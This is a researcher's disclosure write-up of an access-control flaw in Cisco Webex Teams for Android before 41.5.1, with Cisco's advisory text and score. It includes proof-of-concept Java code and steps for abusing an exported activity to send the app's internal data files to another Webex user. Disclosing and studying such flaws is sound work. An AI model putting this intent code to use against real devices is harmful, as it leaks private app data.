A vulnerability in Cisco Webex Teams Mobile (Android) application could allow a local attacker to access to non-sensitive information from an authenticated Webex Teams Mobile user.
The vulnerability is due to improper access handling in the affected software. An attacker could exploit this vulnerability by leveraging the improper access handling through a 3rd party application on an affected device. A successful exploit could allow the attacker to share non-sensitive information to any Webex Spaces the authenticated Webex Teams Mobile (Android) user has access.
Affected Version: This vulnerability affected Cisco Webex Teams Mobile (Android) releases earlier than Release 41.5.1.
The Cisco PSIRT has assigned this bug the following CVSS version 3.1 score. The Base CVSS score as of the time of evaluation is 3.3
Acknowledgement by Cisco:
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx83611
Vulnerability Description:
Webex teams app has exported com.webex.teams.crosslaunch.message activity and it has associated with sharing fragment to share content with space or one2one using some parameters and action like android.intent.extra.STREAM and android.intent.action.SEND.
So any third-party app could have used those params to perform sharing content because app was failed to validate path and file before sharing content for permission.
Step to reproduce:
- Create android app using below code snippet:
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
StrictMode.setVmPolicy(builder.build());
Uri uri = Uri.parse("file:///data/data/com.cisco.wx2.android/shared_prefs/com.cisco.wx2.android_preferences.xml");
Intent intent = new Intent("android.intent.action.SEND");
intent.setClassName("com.cisco.wx2.android", "com.webex.teams.crosslaunch.message");
intent.putExtra("android.intent.extra.STREAM", uri);
intent.setType("");
startActivity(intent);
}
}
- Once created run this app on the device where webex teams installed.
- Run the created app then it will open Webex Teams app with Messaging window to select target, now select target user, here app will attach com.cisco.wx2.android_preferences.xml file to be send.
- Click on send button, it will send attached internal file to target user, this also allows access to data/data/com.cisco.wx2.android/* so all files in apps data including databases could be steal.
Proof of Concept:
Download Video : https://drive.google.com/file/d/1SXElqWb9aFdUEuqjxilRsNCv5PB1mIDv/view?usp=sharing
Or Please Watch in HD :
Note: This vulnerability requires a user to be logged into the Teams app and only non-sensitive info (some app, OS settings, and cached images) can be shared to other Webex spaces. All sensitive information is encrypted, So no CVE was assigned.